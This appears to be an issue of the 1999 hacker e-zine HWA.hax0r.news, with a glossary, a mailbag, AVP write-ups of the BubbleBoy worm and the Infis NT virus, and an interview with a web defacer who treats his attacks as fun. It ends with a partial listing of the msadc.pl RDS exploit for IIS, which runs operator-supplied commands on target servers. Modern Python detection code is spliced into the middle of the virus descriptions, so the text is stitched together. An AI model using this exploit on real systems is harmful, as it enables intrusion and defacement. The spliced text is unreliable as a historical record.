 Spikeman's site is down as of this writing, if it comes back online it will be posted here.

 http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

 Sla5h's email: smuddo@yahoo.com

 *******************************************************************
 *** /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
 *******************************************************************

 :-p

 1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events it's a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for?
never mind, if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, I'd highly recommend you get that book. It's almost like buying a clue. Anyway..on with the show ..

- Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq, it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and used in this zine is listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA    - see EoA ;-)

!=      - Mathematical notation "is not equal to" or "does not equal"
          ASC(247) "wavy equals" sign means "almost equal" to. If written as =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this ain't fucking grade school, cripes, don't believe I just typed all that..)

AAM     - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL     - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??
*CC     - 1 - Credit Card (as in phraud)
          2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC     - Chaos Computer Club (Germany)

*CON    - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk, watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1. Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2. An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger, Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC     - End of Commentary
EoA     - End of Article or more commonly @HWA
EoF     - End of file
EoD     - End of diatribe (AOL'ers: look it up)

FUD     - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d    - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R  - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?'
          2 - A tool for cutting sheet metal.
HHN     - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN     - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00     - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC     - Depends on context: No Further Comment or No Fucking Comment

NFR     - Network Flight Recorder (Do a websearch) see 0wn3d

NFW     - No fuckin' way

*0WN3D  - You are cracked and owned by an elite entity see pheer

*OFCS   - Oh for christ's sakes

PHACV   - And variations of same: Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups, Virus, Warfare

          Alternates: H  - hacking, hacktivist
                      C  - Cracking
                      V  - Virus
                      W  - Warfare
                      A  - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P  - Phreaking, "telephone hacking" PHone fREAKs ...
                      CT - Cyber Terrorism

*PHEER  - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM   - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC     - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA     - To Be Arranged/To Be Announced also 2ba
TFS     - Tough fucking shit.

*w00t   - 1 - Reserved for the uber ereet, no one can say this without severe repercussions from the underground masses. also "w00ten"
          2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf    - what the fuck, where the fuck, when the fuck etc ..

*ZEN    - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like to see more reader input, help me out here, what's good, what sucks etc, not that I guarantee I'll take any notice mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ YTcracker

Folks from #hwa.hax0r.news and #fawkerz, #ninjachat and #sesame

Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://www.hack.co.za NEW
+ http://blacksun.box.sk NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..."
- FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, let's give the message board a bit more use eh?
I'll be using a real message board when the hwa-iwa.org domain comes back online (soon), meanwhile the beseen board is still up...

==============================================================================

Our newsletter gets mirrored and indexed by new underground search engine Nethersearch.com

From: signalGod
To: hwa@press.usmc.net
Sent: Thursday, November 18, 1999 10:00 AM
Subject: NetherSearch.Com

HWA,

I am one of the webmasters of NetherSearch.Com. We subscribed to your newsletter and have decided to download all of your newsletters to our server to act as a mirror for your files. Please feel free to visit our site and check it out, and please let us know what you think. Your newsletters have been added to our database, and are searchable with our database search engine. We would also like to invite you to submit your website to our internet search database. This will help us both by driving some traffic to your site and adding depth to our database.

Thanks,
______________________________________________________
SignalGod
NetherSearch.Com - http://www.nethersearch.com -
- Underground and Hacking Database Search Engine -
Submit a URL to NetherSearch.Com - http://www.nethersearch.com/search/addurl.htm -

-=-

From: Drew aka. Wyzewun
To:
Sent: Friday, November 19, 1999 1:36 PM
Subject: el8 phan mail!@#$%

*Ahem*

Dear HWA.hax0r.news,

Since I have never seen anything in your mailbag, I figured I would write to you and give you something to put there. First off, let me dispel the rumour that Cruciphux has sex with sheep. Second of all, let me dispel the rumour that there never *was* a rumour that Cruciphux has sex with sheep. And in conclusion, I would like to say that I personally enjoy having sex with sheep.

Your zine is the best in the whole wide world, except for that Forbidden Knowledge zine, which is even more kickass. Now who does that again... fux0r, I can't remember. But this is under no circumstances because I am drunk.
Or because Pneuma has mad cheap wine here. It is just because I simply DON'T KNOW, okay?!@#$

Please respond to me as soon as possible and give me a URL for good 1nph0z3 on insecurities in Vortexia's anal cavity - they told me to look for RFC31337, but I can't find it anywhere! Please help...

That Neato Elito Skanky Ass Hoe,
Wyzewun [w1@antioffline.com]
_______________________________________________________________
http://www.webmail.co.za the South-African free email service

-=-

From: Kernel Panic
To: HWA.hax0r.news
Sent: Tuesday, November 16, 1999 5:08 AM
Subject: RE: Issue #41 for Nov 7th out today

==================================================================
The following message was received at HWA.hax0r.news-owner@listbot.com and is being forwarded to you, the list owner.
==================================================================

I just want to say "Thank U for the great job of resuming the events and news of security business"

Keep up with the excellent job

Kernel Panic
SouthAmerica-Peru

______________________________________________________________________
To unsubscribe, write to HWA.hax0r.news-unsubscribe@listbot.com
Start Your Own FREE Email List at http://www.listbot.com/

-=-

From:
To:
Sent: Friday, November 19, 1999 9:06 PM
Subject: xxhax0rxx claims responsibility for hacking & destroying website

Do you know this xxhax0rxx person? He has claimed responsibility for hacking & destroying a school webpage....he also posted in its place a full page of written garbage about our school. Please tell me that he is not affiliated with your group. I can send all correspondence from him to you if you would like. But he claims that he is Hax0r and goes by the screen name of xxhax0rxx.

-=-

Seems that because we have 'hax0r' in our name that we're a target for all kinds of lamers that use an alias or connotation of 'hax0r', notice the 'screenname', good old aol... - Ed

See? we really do get mail Wyze1 ;-) I just don't print it all, ok sometimes I forget, sometimes it's lame ... but kudos are always welcomed... - Ed

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /*
     * We're a week behind schedule with this release again,
     * seems like I'm not doing well in cold season. Being ill
     * sucks and doesn't lend itself towards working on the
     * newsletter. Anyway here it is, have fun.. check out all
     * the new website defacements by sSh (Sesame Street Hackers)
     * they've been busy ppl...
     *
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start =-

[ASCII art banner: "Content start"]

-= start =--= start =--= start =--= start =--= start =--= start =--= start =-

03.0 Bubbleboy email worm description
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.avp.ch

I-Worm.BubbleBoy

Type: Email Worm
Platform: MS Windows with Internet Explorer 5.0, MS Outlook 98/2000 or MS Outlook Express

This is a worm virus spreading via the Internet as infected email messages. The worm arrives as a message with no attachments - the worm uses several tricks to activate its code directly from the message body. When this message is opened, the worm code takes control, gets access to system resources (disk files and system registry), processes the Outlook address book and sends infected messages to these addresses (in a similar way to the "Macro.Word97.Melissa" virus).
This is the first known modern Internet worm that spreads its copies with no attached data. In the case of other Internet worms a user has to open the attachment to activate the worm routines. In the case of this worm its spreading routines take control at the moment the message itself is opened.

The Tricks

To spread its copies this worm uses two tricks. The first one is the feature of MS Outlook that allows creating messages in the HTML format. HTML messages may contain scripts that will be automatically executed at the moment the HTML message is being displayed (user opens the message). The worm uses this feature to run its code when the infected message is opened.

To spread its copies further and to bypass Internet Explorer security the worm uses another trick, the so-called "Scriptlet.Typelib" security vulnerability. This security breach allows HTML scripts to create disk files. The worm uses this breach to create an HTA file (HTML Application, a new file type introduced with IE5) which contains the main worm code. This file is created in the Windows Startup folder, and as a result it is activated on the next Windows startup. Being run as a local disk file, the worm script in this HTML gets access to disk files and resources with no Internet Explorer security warning messages, connects to the Outlook address book and spreads itself.

Technical details

When a user opens an infected message the worm script embedded in the message body is automatically activated and executed by MS Outlook. This script (by using the security breach) creates the "UPDATE.HTA" file in the "C:\WINDOWS\START MENU\PROGRAMS\STARTUP" directory. The worm tries to create the same file in the "C:\WINDOWS\MENU INICIO\PROGRAMAS\INICIO\" directory (the default name on Spanish Windows). This "UPDATE.HTA" file contains the main worm code. It will be executed on the next Windows startup because of its location in the Startup folder.
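A defender-side check for the mechanism just described, added here as an example (not AVP's code, and it reproduces none of the worm's script): it scans an HTML-format message for the three traits the description names, inline script, a reference to the Scriptlet.TypeLib control and an .HTA written under a Startup folder, and checks a host for the infection markers listed in this description. The sample messages are constructed; the registry location assumed for RegisteredOwner is the standard Windows 9x one.

```python
"""Defender-side checks for the BubbleBoy mechanism described above.

Constructed example (not AVP's code, and none of the worm's own script is
reproduced): scan_message() flags the traits the description names in an
HTML-format mail, namely inline script, a reference to the Scriptlet.TypeLib
control and an .HTA written under a Startup folder, and check_host() reports
the infection markers the description lists.
"""
import re
from email import message_from_string
from email.message import Message

SCRIPT_RE = re.compile(r"<script\b", re.I)
TYPELIB_RE = re.compile(r"Scriptlet\.TypeLib", re.I)
# an .HTA path that passes through a Startup folder (English or Spanish name)
HTA_STARTUP_RE = re.compile(r"(startup|inicio)\\+[^\s\"'<>]*\.hta\b", re.I)

# Drop locations and registry marker quoted in the description.
STARTUP_DROPS = (
    r"C:\WINDOWS\START MENU\PROGRAMS\STARTUP\UPDATE.HTA",
    r"C:\WINDOWS\MENU INICIO\PROGRAMAS\INICIO\UPDATE.HTA",
)
MARKER_KEY = r"HKEY_LOCAL_MACHINE\Software\OUTLOOK.BubbleBoy"
# Assumed: the Windows 9x key holding RegisteredOwner/RegisteredOrganization.
REGISTRATION_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"


def html_bodies(msg: Message):
    """Yield the decoded text of every text/html part of a parsed message."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            raw = part.get_payload(decode=True) or b""
            yield raw.decode(part.get_content_charset() or "latin-1", "replace")


def scan_message(raw_message: str) -> dict:
    """Return the traits found plus a verdict: clean, suspicious or bubbleboy-like."""
    msg = message_from_string(raw_message)
    html = "\n".join(html_bodies(msg))
    traits = {
        "inline_script": bool(SCRIPT_RE.search(html)),
        "scriptlet_typelib": bool(TYPELIB_RE.search(html)),
        "hta_into_startup": bool(HTA_STARTUP_RE.search(html)),
        "no_attachment": not any(
            p.get_content_disposition() == "attachment" for p in msg.walk()),
    }
    if traits["inline_script"] and (traits["scriptlet_typelib"] or traits["hta_into_startup"]):
        traits["verdict"] = "bubbleboy-like"   # script that names the control or the drop path
    elif traits["inline_script"]:
        traits["verdict"] = "suspicious"       # any script in a mail body deserves a look
    else:
        traits["verdict"] = "clean"
    return traits


def check_host(existing_files, registry) -> list:
    """List the infection markers present on a host.

    existing_files: paths that exist (compared case-insensitively);
    registry: mapping key -> {value_name: data}. Both are injected so the
    check runs anywhere; on a live host feed it os.path.exists and winreg.
    """
    present = {p.lower() for p in existing_files}
    hits = [p for p in STARTUP_DROPS if p.lower() in present]
    if MARKER_KEY in registry:
        hits.append(MARKER_KEY)
    if registry.get(REGISTRATION_KEY, {}).get("RegisteredOwner") == "BubbleBoy":
        hits.append("RegisteredOwner=BubbleBoy")
    return hits


# Constructed sample messages for the demonstration.
BENIGN = """\
From: news@example.test
Subject: Weekly newsletter
Content-Type: text/html; charset="us-ascii"

<html><body><p>Issue 43 is out. Read it at http://welcome.to/HWA.hax0r.news/</p></body></html>
"""

WORMLIKE = """\
From: someone@example.test
Subject: BubbleBoy back!
Content-Type: text/html; charset="us-ascii"

<html><body>
The BubbleBoy incident, pictures and sounds
http://www.towns.com/dorms/tom/bblboy.htm
<script language="VBScript">
' stand-in for the worm's script: only the control name and drop path appear here
' Scriptlet.TypeLib -> C:\\WINDOWS\\START MENU\\PROGRAMS\\STARTUP\\UPDATE.HTA
MsgBox "System error, delete UPDATE.HTA from the startup folder to solve this problem."
</script></body></html>
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("wormlike", WORMLIKE)):
        print(name, scan_message(sample)["verdict"])
    print(check_host([STARTUP_DROPS[0]], {MARKER_KEY: {"": "OUTLOOK.BubbleBoy 1.0 by Zulu"}}))
```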
The worm has a minor bug here: it assumes that Windows is always installed in the C:\WINDOWS directory; otherwise the worm cannot create its file and fails to replicate further.

When the UPDATE.HTA file is executed, the worm runs the Outlook application in a hidden window and creates a new message to all recipients from the Outlook address book in the same way as the "Melissa" virus does. This new message has the HTML format and contains the worm script in the body. The message subject is "BubbleBoy back!", and the text body looks as follows:

The BubbleBoy incident, pictures and sounds
http://www.towns.com/dorms/tom/bblboy.htm

(Note: the above shown web-address doesn't work)

After this message has been sent, to prevent sending duplicate messages the worm creates the system registry key:

"HKEY_LOCAL_MACHINE\Software\OUTLOOK.BubbleBoy\" = "OUTLOOK.BubbleBoy 1.0 by Zulu"

At the end the worm leaves on the screen a window with the text:

System error, delete "UPDATE.HTA" from the startup folder to solve this problem.

The worm also changes the Windows registration data (this routine is executed at the moment the UPDATE.HTA script takes control):

RegisteredOwner = "BubbleBoy"
RegisteredOrganization = "Vandelay Industries"

Protection

Microsoft has released an update that eliminates this security vulnerability. We strongly recommend you visit http://support.microsoft.com/support/kb/articles/Q240/3/08.ASP and install this update.

If you do not use any HTML applications (HTA files) in your work, there is another way to prevent infection by viruses of this type (the worms and viruses that use the "Scriptlet.Typelib" security vulnerability). It requires removing the file association for the .HTA extension. To do this follow these steps:

1. Double click the My Computer icon on the desktop.
2. In the window that appears choose the menu "View" -> "Options...".
3. On the "File Types" tab, in the "Registered file types" listbox, select the "HTML Application" item.
4. Click the "Remove" button and confirm the action.
5. Close the options dialog box.

@HWA

04.0 WinNT.Infis.4608 new Win NT virus
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.avp.ch/

WinNT.Infis.4608

"Infis" is a memory resident virus operating under Windows NT 4.0 with Service Packs 2, 3, 4, 5, 6 installed. It does not affect systems running Windows 95/98, Windows 2000 or other versions of Windows NT.

Indication of an infection

The virus does not manifest itself in any way and does not do any harm to the system. Despite this the virus has a bug in its infection routine and corrupts some files while infecting them; the corrupted files when run cause the standard "is not a valid Windows NT application" error message. Another indicator of virus presence is the INF.SYS file in the /WinNT/System32/Drivers folder.

Installation

The virus installation routine copies the virus to the system, registers it there and returns control to the host program. As a result, on the first start the virus just installs its "dropper" to the system and does not infect the WinNT memory and other files. The memory and file infection routines will be activated later, when the "dropper" is run.

To install its "dropper" the virus extracts its "pure" code (4608 bytes) as a standalone PE EXE file with the INF.SYS name and writes it to the \SystemRoot\system32\drivers directory. Next the virus adds "run-it" commands to the system registry; to do that the virus creates a new Registry key with three values:

\Registry\Machine\System\CurrentControlSet\Services\inf
  Type = 1         - standard Windows NT driver
  Start = 2        - driver start mode
  ErrorControl = 1 - continue system loading on error in driver

As a result the virus dropper is loaded as a system WinNT driver on the next system restart.

When the INF.SYS virus dropper takes control the virus allocates a block of WinNT memory, reads its complete copy from the INF.SYS file for further use in the infection routine and hooks a poorly documented WinNT internal system function handler.
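A detection check for the marker this description gives, added here as an example (not AVP's code): the Infection paragraph states that the virus sets the PE header time/date stamp of every file it infects to -1 (FFFFFFFFh), so a scanner that parses the PE header can flag such files. The header offsets used are the standard PE/COFF ones, and the test images are fabricated by the block itself rather than taken from an infected system.

```python
"""Scan PE files for the marker the Infis description gives: an infected
file has the PE header time/date stamp set to -1 (FFFFFFFFh).

Constructed example (not AVP's code). The header offsets are the standard
PE/COFF ones; build_minimal_pe() fabricates tiny non-runnable images so
the scanner can be exercised without an infected sample.
"""
import struct
import sys

PE_SIGNATURE = b"PE\0\0"
INFIS_STAMP = 0xFFFFFFFF          # -1 as an unsigned 32-bit value


def parse_pe_header(data: bytes) -> dict:
    """Return COFF header fields and the section table of a PE image.

    Raises ValueError for anything that is not a well-formed PE file, so a
    caller can tell "not PE" apart from "PE and clean".
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    sections = []
    table = coff + 20 + opt_size          # section table follows the optional header
    for i in range(nsections):
        off = table + 40 * i
        if off + 40 > len(data):
            raise ValueError("section table truncated")
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": vaddr,
                         "raw_size": rawsize, "raw_pointer": rawptr})
    return {"machine": machine, "time_date_stamp": stamp,
            "characteristics": chars, "sections": sections}


def infis_marked(data: bytes) -> bool:
    """True when the image carries the FFFFFFFFh stamp Infis writes."""
    return parse_pe_header(data)["time_date_stamp"] == INFIS_STAMP


def scan(data: bytes) -> str:
    """Classify a file: 'not-pe', 'clean' or 'infis-marked'."""
    try:
        return "infis-marked" if infis_marked(data) else "clean"
    except ValueError:
        return "not-pe"


def build_minimal_pe(stamp: int, sections=(("CODE", 0x200),)) -> bytes:
    """Fabricate a minimal PE image (DOS header, COFF header, no optional
    header, section table, section data) for testing the parser."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), stamp & 0xFFFFFFFF, 0, 0, 0, 0x0102)
    ptr = e_lfanew + 4 + 20 + 40 * len(sections)    # section data starts after the table
    table, body = b"", b""
    for name, size in sections:
        table += struct.pack("<8sIIII", name.encode("ascii").ljust(8, b"\0"),
                             size, 0x1000, size, ptr)
        table += b"\0" * 16          # relocation/line-number fields and flags, unused
        body += b"\xCC" * size
        ptr += size
    return dos + PE_SIGNATURE + coff + table + body


if __name__ == "__main__":
    # Scan the files named on the command line; without arguments, run the
    # fabricated clean and marked images through the scanner.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                print(path, scan(fh.read()))
    else:
        print("clean image  :", scan(build_minimal_pe(0x38362F25)))
        print("marked image :", scan(build_minimal_pe(-1)))
```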
The virus hooker intercepts the file opening function only, checks the file name and extension, then opens the file, checks the file format (PE) and runs the infection routine.

Infection

The "Infis" virus infects only PE (Portable Executable) EXE files except CMD.EXE (the Windows NT command processor). To distinguish infected from uninfected files the virus sets the file time and date double word stamp in the PE header to -1 (FFFFFFFFh). While infecting a file the virus increases the size of the last file section, writes itself there and modifies the necessary fields in the file header. As a result when infected PE files are executed, the virus code receives control and runs the installation routine.

Payload

The "Infis" virus does not carry any destructive payload. However, it contains errors that corrupt some files when infecting them. When the corrupted file is run it invokes a standard Windows NT application error message.

05.0 OSALL Interview with Flipz 1st person to deface a Microsoft site.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interview With Flipz
10/27/99
Mike Hudack
Editor-in-Chief

Flipz is a young man who both goes to school and moonlights as a systems analyst somewhere. He's got a bright future for someone only fifteen years old [Editor's NOTE: As the writer of this article, I must admit that I am but sixteen years old.]... And, at that young age, he has been covered in MSNBC, Ziff Davis, Slashdot and so many more. At that young age he's made history as the first person to deface a Microsoft Web page -- ever.

"I do it for fun, just like everyone does it for fun," Flipz said in an effort to explain why he defaces sites, "we don't do it because we have to, we don't do it because we want to, we don't do it because it's fun."

He says that his first defacement was when he was around ten or eleven -- that time a Solaris machine. He knows that he hacks but doesn't know that he's defaced servers?
Andersen Air Force Base

"Hold on five seconds, I'll tell you," he told me when I asked if anything else was happening soon. After a couple affirmatives and a few obscenities he informed me that he'd just gotten his latest defacement. "Andersen.af.mil," he calmly told me. It was just the latest in a string of sites he had previously held root on.

Apparently something has happened in Flipz' life to make him want to just throw it all out. "It's been tough," he said. "I just wanted to have some fun," let out some pent-up aggression.

Microsoft

Now it seems that he targets Microsoft NT boxes exclusively, explaining that he hates Windows NT -- and that Windows 2000 pisses him off even more. The thing that Flipz is most famous for right now is defacing the first Microsoft site ever. He was on the phone with someone when he defaced it... When he heard it was the first he was excited, but not surprised. "I kind of knew it, but I didn't know it," he says about the defacement.

High Profile

Like the Microsoft defacement, all of Flipz' attacks have been attention garnering, although none so much as that. He's attacked numerous military sites, including from the Navy and Army. In addition he's defaced two Department of Energy Web sites and the Duracell Battery Company, among others.

Law Enforcement

It was a couple months ago when Flipz defaced People's Bank, a relatively small Connecticut bank. Somewhat afterwards Attrition.org was subpoenaed for any records they may have pertaining to Flipz and the defacement. When I told him about the subpoena Flipz was rather shocked that the FBI hadn't raided him yet. "It's been a while... you'd think they would have at least stopped me after White Sands [Missile Base.]" The FBI didn't though.

At one point during our conversation Flipz thought he was being raided as a black van rounded the corner to his house. It turned out to be nothing, however. "I'm just sitting on edge, waiting for them to raid me," he said.
He explained that he hadn't done much to cover his tracks because they'd find him anyway. "Why bother with twenty hops when they'll just issue twenty subpoenas?" And, he added, "even if I cover my tracks well... all they need is one person on IRC to say `oh, I know who this person is.'"

The FBI, at this point, doesn't seem to know Flipz' identity. They asked me several times in a later interview, and each time came up empty because I didn't know myself. More is available on the FBI.

Skills

Some people on IRC have questioned Flipz' skills. Flipz says that he "works with NT on a daily basis [as a] systems analyst" but others aren't too sure. "He's demonstrated no real NT skills," said one IRCer who knew Flipz but wished to remain anonymous. This IRCer said that all the defacements were on NT systems running IIS, insinuating that Flipz was simply using the eEye exploit released earlier this year. But Flipz maintains that "I'm not using IIS, I'm not using FrontPage, I'm not using FTP exploits..." Rather, he says he's using "some exploits modified for my own use and a private one or two." More detail on his methodology, or speculation thereof, is available.

Related links:

http://www.aviary-mag.com/News/FBI/fbi.html
http://www.aviary-mag.com/News/Old_News/IIS___eEye/iis___eeye.html
http://www.aviary-mag.com/News/The_Exploit/the_exploit.html

Flipz' Exploit?
(Previously released)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

########################################################################
#!/usr/bin/perl
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well

use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);

print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";

if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
        -h <host>    = host you want to scan (ip or domain)
        -d <seconds> = delay between calls, default 1 second
        -X           = dump Index Server path table, if available
        -N           = query VbBusObj for NetBIOS name
        -V           = use VbBusObj instead of ActiveDataFactory
        -v           = verbose
        -e           = external dictionary file for step 5
        -u <\\\\host\\share\\file> = use UNC file
        -w           = Windows 95 instead of Windows NT
        -c           = v1 compatibility (three step query)
        -s <step>    = run only step <step>

   Or a -R will resume a (v2) command session

~; exit;}

###########################################################
# config data

@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");

# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
 "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner",
 "banners", "ads", "ADCDemo", "ADCTest");

# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
 "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
 "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
 "\\system32\\certmdb.mdb",
 "\\system32\\ias\\ias.mdb",
 "\\system32\\ias\\dnary.mdb",
 "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%

@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
 "\\cfusion\\cfapps\\forums\\forums_.mdb",
 "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
 "\\cfusion\\cfapps\\security\\realm_.mdb",
 "\\cfusion\\cfapps\\security\\data\\realm.mdb",
 "\\cfusion\\database\\cfexamples.mdb",
 "\\cfusion\\database\\cfsnippets.mdb",
 "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
 "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
 "\\cfusion\\brighttiger\\database\\cleam.mdb",
 "\\cfusion\\database\\smpolicy.mdb",
 "\\cfusion\\database\\cypress.mdb",
 "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
 "\\website\\cgi-win\\dbsample.mdb",
 "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
 "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \

###########################################################

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";

if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }

print "Type the command line you want to run ($comm assumed):\n" . "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;

if (!defined $args{s} || $args{s}==1){
